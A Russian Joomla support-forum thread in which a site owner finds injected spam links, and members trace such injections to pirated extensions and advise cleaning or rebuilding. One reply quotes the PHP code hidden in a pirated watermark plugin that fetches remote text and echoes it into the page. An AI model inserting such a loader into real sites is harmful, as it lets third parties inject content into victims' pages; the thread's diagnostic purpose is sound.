Форум русской поддержки Joomla!® CMS
28.07.2017, 19:04:51 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти

Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Основной курс по Joomla
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Появился левый текст на сайте

(Прочитано 472 раз)
vipopo
Новичок
*

« : 22.03.2017, 16:16:54 »

Заметили на сайте левый текст

<div style="/* position: absolute; *//* top: -1000px; */">
Калькулятор расчета пеноблоков смотрите <a href="http://fortstroi.com.ua/stroitelstvo/stati/item/2003-raschet-kolichestva-penoblokov-online-kalkulyator">на этом ресурсе</a><br>
Все о каркасном доме можно найти здесь <a href="http://stroidom-shop.ru/svoimi-rukami/karkasnyiy-dom-6x6.html">http://stroidom-shop.ru</a><br>
Что лучше инжектор или карбюратор? Подробнее на странице <a href="http://kamael.com.ua/1/sovety-avtomobilistam/327-inzhektor-ili-karbyurator-chto-luchshe">http://kamael.com.ua</a>
</div>

откуда появился я не понимаю. в шаблоне нет такого текста.
Помогите разобраться !

Посмотрела на многих сайтах сделанных на Joomla такой текст присутсствует
wishlight
Профи

skype aqaus.com

« Ответ #1 : 22.03.2017, 16:21:34 »

Вы расширения ставили с официальных источников?
dmitry_stas
Профи

« Ответ #2 : 22.03.2017, 16:38:53 »

Посмотрела на многих сайтах сделанных на Joomla такой текст присутсствует
опять Joomla виновата Azn ох уж эта Joomla Azn

если бы хотя бы все пытались сначала разобраться, где же они, эти официальные источники... а то встретился - надо качать срочно, пока есть. потом же не будет Azn а что это, откуда, что внутри... кто об этом думает? Azn
vipopo
Новичок
*

« Ответ #3 : 22.03.2017, 16:50:53 »

я не помню ) я даже не заметила когда это появилось
SeBun
Практически профи

@SeBun48

« Ответ #4 : 22.03.2017, 17:00:47 »

откуда появился я не понимаю. в шаблоне нет такого текста.
Помогите разобраться !
Обычно появлется после запуска сайта, может через какое то время, не сразу. Почему, читайте здесь: Не используйте варез!

В двух словах - когда вы качаете расширения с разных варезников, новомодных складчин и т.д., в них присутствует такой код. Он дает возможность третьим лицам зарабатывать на вашем сайте. В шаблоне он или еще где, данный код надежно спрятан. И теперь вам придется либо лечить сайт, либо забить и дальше пользоваться халявкой. Бесплатный сыр, он такой... Сначала сладкий, а потом - диарея.
dmitry_stas
Профи

« Ответ #5 : 22.03.2017, 17:50:33 »

теперь вам придется либо лечить сайт, либо забить и дальше пользоваться халявкой
ага. а забить на это - это значит и на сайт забить. потому что он с поисковиков вывалится с таким содержанием, и толку с него будет... Azn

я не помню ) я даже не заметила когда это появилось
вы же по улице идете - всякую гадость не подымаете? или тоже все тяните по карманам, авось пригодится? Azn нельзя же так... теперь вот деньги платить, лечить...
voland
Профи

СКАЙП утерян! Пишите в телеграм @volandku

« Ответ #6 : 22.03.2017, 17:58:38 »

вы же по улице идете - всякую гадость не подымаете? или тоже все тяните по карманам, авось пригодится? Azn нельзя же так... теперь вот деньги платить, лечить...
Кто ж знает...
IT-бомж, может
vipopo
Новичок
*

« Ответ #7 : 23.03.2017, 09:48:29 »

Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
ChaosHead
Профи

« Ответ #8 : 23.03.2017, 10:29:51 »

Вы не представляете количество людей, которое тут выстроится так-же на халяву лечить сайты, а потом снова пойдёт качать шаблончик откуда-нибудь там. Но им помочь не смогут, т.к. нет волшебного антивируса, всё чистящего. Это нужно с красными глазами залазить на несколько часов и пересматривать кучу файлов, сравнивать с чистой Joomla и чистыми расширениями, проверять шаблон и не факт, что с первого раза найдешь всё, а зараза расползается по новой. А она там впихнута не просто текстом, они там её и шифруют и скриптами подгружают, чего только не выдумывают. В общем всё сделали для того, чтобы новичку ни в жизнь было самому не разобраться и профи тоже помучился. Поэтому и остаётся только поучать народ.
Есть только один лёгкий способ - это стереть сайт и восстановить резервную копию, которую вы сделали до того, как подцепили эту штуку.
« Последнее редактирование: 23.03.2017, 10:35:19 от ChaosHead » Записан
SeBun
Практически профи

@SeBun48

« Ответ #9 : 23.03.2017, 11:10:13 »

Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
Мы вам и стараемся помочь, отвечая на ваши вопросы и детально разжовывая возникшую у вас ситуацию. Теперь вы знаете ответы на вопросы "почему", "откуда", "зачем" и "что делать". Собственно это все, что мы можем для вас в данной ситуации сделать. Хотите удалить гадость с сайта? Придется платить либо делать сайт заново, как сказал ChaosHead, ибо нет такого антивируса, способного анализировать код, нужен даже не знаток PHP, а специалист, знающий, что именно нужно искать.

Есть только один лёгкий способ - это стереть сайт и восстановить резервную копию, которую вы сделали до того, как подцепили эту штуку.
И то не факт.
dmitry_stas
Профи

« Ответ #10 : 23.03.2017, 11:34:27 »

само собой нет. невозможно к сожалению родится сразу такими умными. сначала были тупые. а потом начали читать всякую фигню, что другие пишут, и стали умными Azn и у вас получится, если захотите, я уверен. только реакция должна быть другая - не губы надутые, а выводы правильные. и все получится Azn

а по поводу помочь - к сожалению вам тут ничем не поможешь более, кроме как указать путь в коммерческий раздел. потому что сами вы сайт все равно не вылечите. ну или как уже сказали полностью удаляйте его, и делайте заново, на расширениях скачанных только с официальных источников
vipopo
Новичок
*

« Ответ #11 : 23.03.2017, 11:48:51 »

только реакция должна быть другая - не губы надутые, а выводы правильные. и все получится Azn

Ну как раз я губы надула, и сделала выводы. Но ведь дело сделано и надо искать решения.

Написала, подумала вдруг умный человек уже решал такую проблему! А вы сразу думать надо было! Вот натворила делов, и думаю.
Septdir
Практически профи

« Ответ #12 : 23.03.2017, 13:09:54 »

Ну как раз я губы надула, и сделала выводы. Но ведь дело сделано и надо искать решения.

Написала, подумала вдруг умный человек уже решал такую проблему! А вы сразу думать надо было! Вот натворила делов, и думаю.
На самом деле, вы не одна такая, не скажу что большинство, но многие на эти грабли наступали. Что же до решения, то у новичка их три.
1. Обратиться к специалисту. За относительно не маленькую сумму, вам сайт почистят (скупой платит дважды)
2. Стереть сайт и создать заного. На самом деле даже специалист может прийти к такому выводу ибо иногда проще сайт пересобрать чем пытаться вычистить. (откат от бэкапа не всегда выход ибо, как я понял вы не знаете что именно привело к заражению)
3. Научиться, вариант конечно самый лучший, но чтобы этому научиться мало выучить языки программирования, надо знать специфику + всегда быть в "тренде", а на это могут уйти годы.

Так что если время, силы и знания позволяют, то самый эконом вариант пересобрать сайт целиком. Ну и выучить простейшие правила.
1. Ни каких варезов. Поймите ломать винду и раздавать ее нахалву народу - это хобби. А варез для сайтов - это бизнес.
2. На всегда должны быть акт ильные версии дивжка и расширений.
3. Обновляться быстро. Иногда уже через час, а то и меньше после выхода обновления  начинают бить по уязвимости.
4. Всегда следить за сайтом. в частности за изменениями в файлах. Поймав момент заражения, устранить причину и последствия куда легче.
Ну вот как-то так.
SeBun
Практически профи

@SeBun48

« Ответ #13 : 23.03.2017, 14:33:10 »

3. Научиться
Я только через 6 лет примерно начал понимать PHP (не говоря о знаниях касательно взлома, они пришли позднее), вы хотите, что бы она научилась сама чистить сайт? И все ради одного сайта?
vipopo
Новичок
*

« Ответ #14 : 23.03.2017, 14:56:20 »

Вообщем у меня получилось, методом удаления всякий ненужной фигни! почистила сайт, и этого кода нет.

Спасибо за советы, теперь буду думать что скачивать.
Septdir
Практически профи

« Ответ #15 : 23.03.2017, 18:49:34 »

Я только через 6 лет примерно начал понимать PHP (не говоря о знаниях касательно взлома, они пришли позднее), вы хотите, что бы она научилась сама чистить сайт? И все ради одного сайта?
Ну я php для одного сайта изучал=)
Вообщем у меня получилось, методом удаления всякий ненужной фигни! почистила сайт, и этого кода нет.

Спасибо за советы, теперь буду думать что скачивать.

Только причину вы не убрали =)
dmitry_stas
Профи

« Ответ #16 : 23.03.2017, 19:26:40 »

Только причину вы не убрали =)
99% что так и есть. убрано следствие, но не причина. через время все будет точно также, как и было. хотя конечно маленький шанс, что были только ссылки и ничего больше, все же остается Azn
vipopo
Новичок
*

« Ответ #17 : 24.03.2017, 10:17:24 »

Я надеюсь эту гадость я удалила=) но буду наблюдать еще.  На сегодня пока еще нет ))
SeBun
Практически профи

@SeBun48

« Ответ #18 : 24.03.2017, 13:20:10 »

Я надеюсь эту гадость я удалила=) но буду наблюдать еще.  На сегодня пока еще нет ))
Представьте, что вы покупаете сливу (по аналогии постановки из Уральских пельменей). Вы увидели, что в магазине акция - сливы за четверть цены продают. И купили ровно одну штуку. Вы намеревались ее съесть. Но когда вы стояли на кассе, за вами выстроилась очередь, а у кассира кончилась лента в терминале, да и сливу вы взвесили неправильно, а очередь ругается. И вот кассир под давлением обстоятельств предлагает вам эту сливу съесть. Все соглашаются. И в момент, когда вы от сливы остается только косточка, вы обнаруживаете в ней дырочку. Опа! - думаете вы, червячок. Вы спрашиваете у толпы - "Народ, как удалить червячка"? Вам умный дядечка говорит, что надо вскрывать желудок и чистить. Вы же решаете, что дядечка преувеличивает и будет лучше дома поставить клизму и решить все проблемы. Использовав нехитрый инструмент вы проводите процедуру и видите среди эм...всего прочего... мертвого червячка. Вашему ликованию нет предела! А между тем, в желудке медленно разлагается штрихкод, который был приклеен на сливу, выделяя токсичные вещества, а ДНК уже начали мутацию под воздействием ГМО...

Вот примерно то, что происходит с вашим сайтом. Никто не знает, что там внутри. И обычно одной строчкой кода, которая выводит видимую ссылку, дело не ограничивается.
dmitry_stas
Профи

« Ответ #19 : 24.03.2017, 14:01:05 »

ого... я тоже хочу... Azn
vipopo
Новичок
*

« Ответ #20 : 24.03.2017, 14:13:24 »

я все таки надеюсь на лучшее  Roll Eyes
Septdir
Практически профи

« Ответ #21 : 24.03.2017, 19:36:47 »

Представьте, что вы покупаете сливу (по аналогии постановки из Уральских пельменей). Вы увидели, что в магазине акция - сливы за четверть цены продают. И купили ровно одну штуку. Вы намеревались ее съесть. Но когда вы стояли на кассе, за вами выстроилась очередь, а у кассира кончилась лента в терминале, да и сливу вы взвесили неправильно, а очередь ругается. И вот кассир под давлением обстоятельств предлагает вам эту сливу съесть. Все соглашаются. И в момент, когда вы от сливы остается только косточка, вы обнаруживаете в ней дырочку. Опа! - думаете вы, червячок. Вы спрашиваете у толпы - "Народ, как удалить червячка"? Вам умный дядечка говорит, что надо вскрывать желудок и чистить. Вы же решаете, что дядечка преувеличивает и будет лучше дома поставить клизму и решить все проблемы. Использовав нехитрый инструмент вы проводите процедуру и видите среди эм...всего прочего... мертвого червячка. Вашему ликованию нет предела! А между тем, в желудке медленно разлагается штрихкод, который был приклеен на сливу, выделяя токсичные вещества, а ДНК уже начали мутацию под воздействием ГМО...

Вот примерно то, что происходит с вашим сайтом. Никто не знает, что там внутри. И обычно одной строчкой кода, которая выводит видимую ссылку, дело не ограничивается.
А я думал червичок личинки отложил =)
Bowa
Давно я тут

« Ответ #22 : 29.06.2017, 14:44:16 »

Нашел эту гадость в плагине для Watermar под Joomla
Вот источник: http://jom.su/watermark-vodyanoie-znak-dlya-kartinok-na-saieti-joomla-3.x.html
в вайле плагина sc_jcms.php
в самом низу есть такой код обращения к текстовому файлу
Код:
<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
Вот он эту гадость и тащит в Joomla
dmitry_stas
Профи

« Ответ #23 : 30.06.2017, 08:25:20 »

это есть именно в исходнике, или уже у вас на сайте?
voland
Профи

СКАЙП утерян! Пишите в телеграм @volandku

« Ответ #24 : 30.06.2017, 09:08:59 »

Нашел эту гадость в плагине для Watermar под Joomla
Вот источник: http://jom.su/watermark-vodyanoie-znak-dlya-kartinok-na-saieti-joomla-3.x.html
в вайле плагина sc_jcms.php
в самом низу есть такой код обращения к текстовому файлу
Код:
<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
Вот он эту гадость и тащит в Joomla
Логично. Скачано же с варезника!
Обсуждение вареза запрещено!
dmitry_stas
Профи

« Ответ #25 : 30.06.2017, 14:52:52 »

а, понятно. не заходил на сам сайт, не видел что это варезник. ну тогда да, все логично. тогда там может и не только это. и уже может и не только там Azn
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  

Перейти в: